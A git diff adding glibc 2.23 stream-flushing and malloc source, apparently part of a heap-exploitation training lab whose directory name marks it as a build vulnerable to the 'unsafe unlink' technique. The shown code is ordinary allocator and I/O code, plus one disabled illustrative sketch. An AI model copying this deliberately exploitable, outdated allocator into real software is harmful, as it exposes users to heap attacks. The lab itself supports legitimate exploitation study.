+				    > fp->_wide_data->_IO_write_base))
+#endif
+	   )
+	  && _IO_OVERFLOW (fp, EOF) == EOF)
+	result = EOF;
+
+      if (do_lock)
+	_IO_funlockfile (fp);
+      run_fp = NULL;
+
+      if (last_stamp != _IO_list_all_stamp)
+	{
+	  /* Something was added to the list.  Start all over again.  */
+	  fp = (_IO_FILE *) _IO_list_all;
+	  last_stamp = _IO_list_all_stamp;
+	}
+      else
+	fp = fp->_chain;
+    }
+
+#ifdef _IO_MTSAFE_IO
+  if (do_lock)
+    _IO_lock_unlock (list_all_lock);
+  __libc_cleanup_region_end (0);
+#endif
+
+  return result;
+}
+
+
+int
+_IO_flush_all (void)
+{
+  /* We want locking.  */
+  return _IO_flush_all_lockp (1);
+}
+libc_hidden_def (_IO_flush_all)
+
+void
+_IO_flush_all_linebuffered (void)
+{
+  struct _IO_FILE *fp;
+  int last_stamp;
+
+#ifdef _IO_MTSAFE_IO
+  _IO_cleanup_region_start_noarg (flush_cleanup);
+  _IO_lock_lock (list_all_lock);
+#endif
+
+  last_stamp = _IO_list_all_stamp;
+  fp = (_IO_FILE *) _IO_list_all;
+  while (fp != NULL)
+    {
+      run_fp = fp;
+      _IO_flockfile (fp);
+
+      if ((fp->_flags & _IO_NO_WRITES) == 0 && fp->_flags & _IO_LINE_BUF)
+	_IO_OVERFLOW (fp, EOF);
+
+      _IO_funlockfile (fp);
+      run_fp = NULL;
+
+      if (last_stamp != _IO_list_all_stamp)
+	{
+	  /* Something was added to the list.  Start all over again.  */
+	  fp = (_IO_FILE *) _IO_list_all;
+	  last_stamp = _IO_list_all_stamp;
+	}
+      else
+	fp = fp->_chain;
+    }
+
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_unlock (list_all_lock);
+  _IO_cleanup_region_end (0);
+#endif
+}
+libc_hidden_def (_IO_flush_all_linebuffered)
+#ifdef _LIBC
+weak_alias (_IO_flush_all_linebuffered, _flushlbf)
+#endif
+
+
+/* The following is a bit tricky.  In general, we want to unbuffer the
+   streams so that all output which follows is seen.  If we are not
+   looking for memory leaks it does not make much sense to free the
+   actual buffer because this will happen anyway once the program
+   terminates.  If we do want to look for memory leaks we have to free
+   the buffers.  Whether something is freed is determined by the
+   functions in the libc_freeres section.  Those are called as part of
+   the atexit routine, just like _IO_cleanup.  The problem is that we do
+   not know whether the freeres code is called first or _IO_cleanup.
+   If the former is the case, we set the DEALLOC_BUFFERS variable to
+   true and _IO_unbuffer_all will take care of the rest.  If
+   _IO_unbuffer_all is called first we add the streams to a list
+   which the freeres function can later walk through.  */
+static void _IO_unbuffer_all (void);
+
+static bool dealloc_buffers;
+static _IO_FILE *freeres_list;
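+
+/* [Editor's illustration -- not part of the original glibc source.]  A
+   minimal, self-contained sketch of the ordering-agnostic cleanup pattern
+   described in the comment above: two teardown routines that may run in
+   either order coordinate through a flag and a pending list.  The names
+   resource_t, release_all and unhook_all are invented for this sketch and
+   only loosely mirror buffer_free/_IO_unbuffer_all; the block is disabled
+   with #if 0 so it cannot affect the build.  */
+#if 0
+#include <stdbool.h>
+#include <stdlib.h>
+
+typedef struct resource { struct resource *next; void *buf; } resource_t;
+
+static bool release_directly;   /* set once release_all has run */
+static resource_t *pending;     /* resources unhooked before release_all ran */
+
+/* Analogous to the libc_freeres function: free whatever was queued and
+   tell later callers to free directly.  */
+static void
+release_all (void)
+{
+  release_directly = true;
+  while (pending != NULL)
+    {
+      free (pending->buf);
+      pending = pending->next;
+    }
+}
+
+/* Analogous to _IO_unbuffer_all: either free now (the freeres pass already
+   ran) or queue the buffer for the freeres pass to find later.  */
+static void
+unhook_all (resource_t *list)
+{
+  while (list != NULL)
+    {
+      resource_t *next = list->next;
+      if (release_directly)
+        free (list->buf);
+      else
+        {
+          list->next = pending;
+          pending = list;
+        }
+      list = next;
+    }
+}
+#endif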
+
+static void
+_IO_unbuffer_all (void)
+{
+  struct _IO_FILE *fp;
+  for (fp = (_IO_FILE *) _IO_list_all; fp; fp = fp->_chain)
+    {
+      if (! (fp->_flags & _IO_UNBUFFERED)
+	  /* Iff stream is un-orientated, it wasn't used. */
+	  && fp->_mode != 0)
+	{
+#ifdef _IO_MTSAFE_IO
+	  int cnt;
+#define MAXTRIES 2
+	  for (cnt = 0; cnt < MAXTRIES; ++cnt)
+	    if (fp->_lock == NULL || _IO_lock_trylock (*fp->_lock) == 0)
+	      break;
+	    else
+	      /* Give the other thread time to finish up its use of the
+		 stream.  */
+	      __sched_yield ();
+#endif
+
+	  if (! dealloc_buffers && !(fp->_flags & _IO_USER_BUF))
+	    {
+	      fp->_flags |= _IO_USER_BUF;
+
+	      fp->_freeres_list = freeres_list;
+	      freeres_list = fp;
+	      fp->_freeres_buf = fp->_IO_buf_base;
+	    }
+
+	  _IO_SETBUF (fp, NULL, 0);
+
+	  if (fp->_mode > 0)
+	    _IO_wsetb (fp, NULL, NULL, 0);
+
+#ifdef _IO_MTSAFE_IO
+	  if (cnt < MAXTRIES && fp->_lock != NULL)
+	    _IO_lock_unlock (*fp->_lock);
+#endif
+	}
+
+      /* Make sure that the wide char functions can never be used
+	 again.  */
+      fp->_mode = -1;
+    }
+}
+
+
+libc_freeres_fn (buffer_free)
+{
+  dealloc_buffers = true;
+
+  while (freeres_list != NULL)
+    {
+      free (freeres_list->_freeres_buf);
+
+      freeres_list = freeres_list->_freeres_list;
+    }
+}
+
+
+int
+_IO_cleanup (void)
+{
+  /* We do *not* want locking.  Some threads might use streams but
+     that is their problem, we flush them underneath them.  */
+  int result = _IO_flush_all_lockp (0);
+
+  /* We currently don't have a reliable mechanism for making sure that
+     C++ static destructors are executed in the correct order.
+     So it is possible that other static destructors might want to
+     write to cout - and they're supposed to be able to do so.
+
+     The following will make the standard streambufs be unbuffered,
+     which forces any output from late destructors to be written out. */
+  _IO_unbuffer_all ();
+
+  return result;
+}
+
+
+void
+_IO_init_marker (struct _IO_marker *marker, _IO_FILE *fp)
+{
+  marker->_sbuf = fp;
+  if (_IO_in_put_mode (fp))
+    _IO_switch_to_get_mode (fp);
+  if (_IO_in_backup (fp))
+    marker->_pos = fp->_IO_read_ptr - fp->_IO_read_end;
+  else
+    marker->_pos = fp->_IO_read_ptr - fp->_IO_read_base;
+
+  /* Should perhaps sort the chain? */
+  marker->_next = fp->_markers;
+  fp->_markers = marker;
+}
+
+void
+_IO_remove_marker (struct _IO_marker *marker)
+{
+  /* Unlink from sb's chain. */
+  struct _IO_marker **ptr = &marker->_sbuf->_markers;
+  for (; ; ptr = &(*ptr)->_next)
+    {
+      if (*ptr == NULL)
+	break;
+      else if (*ptr == marker)
+	{
+	  *ptr = marker->_next;
+	  return;
+	}
+    }
+#if 0
+    if _sbuf has a backup area that is no longer needed, should we delete
+    it now, or wait until the next underflow?
+#endif
+}
+
+#define BAD_DELTA EOF
+
+int
+_IO_marker_difference (struct _IO_marker *mark1, struct _IO_marker *mark2)
+{
+  return mark1->_pos - mark2->_pos;
+}
+
+/* Return difference between MARK and current position of MARK's stream. */
+int
+_IO_marker_delta (struct _IO_marker *mark)
+{
+  int cur_pos;
+  if (mark->_sbuf == NULL)
+    return BAD_DELTA;
+  if (_IO_in_backup (mark->_sbuf))
+    cur_pos = mark->_sbuf->_IO_read_ptr - mark->_sbuf->_IO_read_end;
+  else
+    cur_pos = mark->_sbuf->_IO_read_ptr - mark->_sbuf->_IO_read_base;
+  return mark->_pos - cur_pos;
+}
+
+int
+_IO_seekmark (_IO_FILE *fp, struct _IO_marker *mark, int delta)
+{
+  if (mark->_sbuf != fp)
+    return EOF;
+  if (mark->_pos >= 0)
+    {
+      if (_IO_in_backup (fp))
+	_IO_switch_to_main_get_area (fp);
+      fp->_IO_read_ptr = fp->_IO_read_base + mark->_pos;
+    }
+  else
+    {
+      if (!_IO_in_backup (fp))
+	_IO_switch_to_backup_area (fp);
+      fp->_IO_read_ptr = fp->_IO_read_end + mark->_pos;
+    }
+  return 0;
+}
+
+void
+_IO_unsave_markers (_IO_FILE *fp)
+{
+  struct _IO_marker *mark = fp->_markers;
+  if (mark)
+    {
+#ifdef TODO
+      streampos offset = seekoff (0, ios::cur, ios::in);
+      if (offset != EOF)
+	{
+	  offset += eGptr () - Gbase ();
+	  for ( ; mark != NULL; mark = mark->_next)
+	    mark->set_streampos (mark->_pos + offset);
+	}
+    else
+      {
+	for ( ; mark != NULL; mark = mark->_next)
+	  mark->set_streampos (EOF);
+      }
+#endif
+      fp->_markers = 0;
+    }
+
+  if (_IO_have_backup (fp))
+    _IO_free_backup_area (fp);
+}
+libc_hidden_def (_IO_unsave_markers)
+
+#if 0
+/* Seems not to be needed. --drepper */
+int
+_IO_nobackup_pbackfail (_IO_FILE *fp, int c)
+{
+  if (fp->_IO_read_ptr > fp->_IO_read_base)
+	fp->_IO_read_ptr--;
+  if (c != EOF && *fp->_IO_read_ptr != c)
+      *fp->_IO_read_ptr = c;
+  return (unsigned char) c;
+}
+#endif
+
+int
+_IO_default_pbackfail (_IO_FILE *fp, int c)
+{
+  if (fp->_IO_read_ptr > fp->_IO_read_base && !_IO_in_backup (fp)
+      && (unsigned char) fp->_IO_read_ptr[-1] == c)
+    --fp->_IO_read_ptr;
+  else
+    {
+      /* Need to handle a filebuf in write mode (switch to read mode). FIXME!*/
+      if (!_IO_in_backup (fp))
+	{
+	  /* We need to keep the invariant that the main get area
+	     logically follows the backup area.  */
+	  if (fp->_IO_read_ptr > fp->_IO_read_base && _IO_have_backup (fp))
+	    {
+	      if (save_for_backup (fp, fp->_IO_read_ptr))
+		return EOF;
+	    }
+	  else if (!_IO_have_backup (fp))
+	    {
+	      /* No backup buffer: allocate one. */
+	      /* Use nshort buffer, if unused? (probably not)  FIXME */
+	      int backup_size = 128;
+	      char *bbuf = (char *) malloc (backup_size);
+	      if (bbuf == NULL)
+		return EOF;
+	      fp->_IO_save_base = bbuf;
+	      fp->_IO_save_end = fp->_IO_save_base + backup_size;
+	      fp->_IO_backup_base = fp->_IO_save_end;
+	    }
+	  fp->_IO_read_base = fp->_IO_read_ptr;
+	  _IO_switch_to_backup_area (fp);
+	}
+      else if (fp->_IO_read_ptr <= fp->_IO_read_base)
+	{
+	  /* Increase size of existing backup buffer. */
+	  _IO_size_t new_size;
+	  _IO_size_t old_size = fp->_IO_read_end - fp->_IO_read_base;
+	  char *new_buf;
+	  new_size = 2 * old_size;
+	  new_buf = (char *) malloc (new_size);
+	  if (new_buf == NULL)
+	    return EOF;
+	  memcpy (new_buf + (new_size - old_size), fp->_IO_read_base,
+		  old_size);
+	  free (fp->_IO_read_base);
+	  _IO_setg (fp, new_buf, new_buf + (new_size - old_size),
+		    new_buf + new_size);
+	  fp->_IO_backup_base = fp->_IO_read_ptr;
+	}
+
+      *--fp->_IO_read_ptr = c;
+    }
+  return (unsigned char) c;
+}
+libc_hidden_def (_IO_default_pbackfail)
+
+_IO_off64_t
+_IO_default_seek (_IO_FILE *fp, _IO_off64_t offset, int dir)
+{
+  return _IO_pos_BAD;
+}
+
+int
+_IO_default_stat (_IO_FILE *fp, void *st)
+{
+  return EOF;
+}
+
+_IO_ssize_t
+_IO_default_read (_IO_FILE *fp, void *data, _IO_ssize_t n)
+{
+  return -1;
+}
+
+_IO_ssize_t
+_IO_default_write (_IO_FILE *fp, const void *data, _IO_ssize_t n)
+{
+  return 0;
+}
+
+int
+_IO_default_showmanyc (_IO_FILE *fp)
+{
+  return -1;
+}
+
+void
+_IO_default_imbue (_IO_FILE *fp, void *locale)
+{
+}
+
+_IO_ITER
+_IO_iter_begin (void)
+{
+  return (_IO_ITER) _IO_list_all;
+}
+libc_hidden_def (_IO_iter_begin)
+
+_IO_ITER
+_IO_iter_end (void)
+{
+  return NULL;
+}
+libc_hidden_def (_IO_iter_end)
+
+_IO_ITER
+_IO_iter_next (_IO_ITER iter)
+{
+  return iter->_chain;
+}
+libc_hidden_def (_IO_iter_next)
+
+_IO_FILE *
+_IO_iter_file (_IO_ITER iter)
+{
+  return iter;
+}
+libc_hidden_def (_IO_iter_file)
+
+void
+_IO_list_lock (void)
+{
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_lock (list_all_lock);
+#endif
+}
+libc_hidden_def (_IO_list_lock)
+
+void
+_IO_list_unlock (void)
+{
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_unlock (list_all_lock);
+#endif
+}
+libc_hidden_def (_IO_list_unlock)
+
+void
+_IO_list_resetlock (void)
+{
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_init (list_all_lock);
+#endif
+}
+libc_hidden_def (_IO_list_resetlock)
+
+
+#ifdef TODO
+#if defined(linux)
+#define IO_CLEANUP ;
+#endif
+
+#ifdef IO_CLEANUP
+  IO_CLEANUP
+#else
+struct __io_defs {
+    __io_defs() { }
+    ~__io_defs() { _IO_cleanup (); }
+};
+__io_defs io_defs__;
+#endif
+
+#endif /* TODO */
+
+#ifdef text_set_element
+text_set_element(__libc_atexit, _IO_cleanup);
+#endif
diff --git a/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/malloc/malloc.c
new file mode 100644
index 0000000..096ec89
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/malloc/malloc.c
@@ -0,0 +1,5239 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2016 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    cfree(void* p);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+    MALLOC_ALIGNMENT           MAX (2 * sizeof(INTERNAL_SIZE_T),
+				    __alignof__ (long double))
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <malloc-machine.h>
+#include <malloc-sysdep.h>
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et al.  */
+#include <libc-internal.h>
+
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifdef NDEBUG
+# define assert(expr) ((void) 0)
+#else
+# define assert(expr) \
+  ((expr)								      \
+   ? ((void) 0)								      \
+   : __malloc_assert (#expr, __FILE__, __LINE__, __func__))
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+
+/*
+  INTERNAL_SIZE_T is the word-size used for internal bookkeeping
+  of chunk sizes.
+
+  The default version is the same as size_t.
+
+  While not strictly necessary, it is best to define this as an
+  unsigned type, even if size_t is a signed type. This may avoid some
+  artificial size limitations on some systems.
+
+  On a 64-bit machine, you may be able to reduce malloc overhead by
+  defining INTERNAL_SIZE_T to be a 32 bit `unsigned int' at the
+  expense of not being able to handle more than 2^32 of malloced
+  space. If this limitation is acceptable, you are encouraged to set
+  this unless you are on a platform requiring 16byte alignments. In
+  this case the alignment requirements turn out to negate any
+  potential advantages of decreasing size_t word size.
+
+  Implementors: Beware of the possible combinations of:
+     - INTERNAL_SIZE_T might be signed or unsigned, might be 32 or 64 bits,
+       and might be the same width as int or as long
+     - size_t might have different width and signedness as INTERNAL_SIZE_T
+     - int and long might be 32 or 64 bits, and might be the same width
+  To deal with this, most comparisons and difference computations
+  among INTERNAL_SIZE_Ts should cast them to unsigned long, being
+  aware of the fact that casting an unsigned int to a wider long does
+  not sign-extend. (This also makes checking for negative numbers
+  awkward.) Some of these casts result in harmless compiler warnings
+  on some systems.
+*/
+
+#ifndef INTERNAL_SIZE_T
+#define INTERNAL_SIZE_T size_t
+#endif
+
+/* The corresponding word size */
+#define SIZE_SZ                (sizeof(INTERNAL_SIZE_T))
+
+
+/*
+  MALLOC_ALIGNMENT is the minimum alignment for malloc'ed chunks.
+  It must be a power of two at least 2 * SIZE_SZ, even on machines
+  for which smaller alignments would suffice. It may be defined as
+  larger than this though. Note however that code and data structures
+  are optimized for the case of 8-byte alignment.
+*/
+
+
+#ifndef MALLOC_ALIGNMENT
+# if !SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_16)
+/* This is the correct definition when there is no past ABI to constrain it.
+
+   Among configurations with a past ABI constraint, it differs from
+   2*SIZE_SZ only on powerpc32.  For the time being, changing this is
+   causing more compatibility problems due to malloc_get_state and
+   malloc_set_state than will returning blocks not adequately aligned for
+   long double objects under -mlong-double-128.  */
+
+#  define MALLOC_ALIGNMENT       (2 *SIZE_SZ < __alignof__ (long double)      \
+                                  ? __alignof__ (long double) : 2 *SIZE_SZ)
+# else
+#  define MALLOC_ALIGNMENT       (2 *SIZE_SZ)
+# endif
+#endif
+
+/* The corresponding bit mask value */
+#define MALLOC_ALIGN_MASK      (MALLOC_ALIGNMENT - 1)
+
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
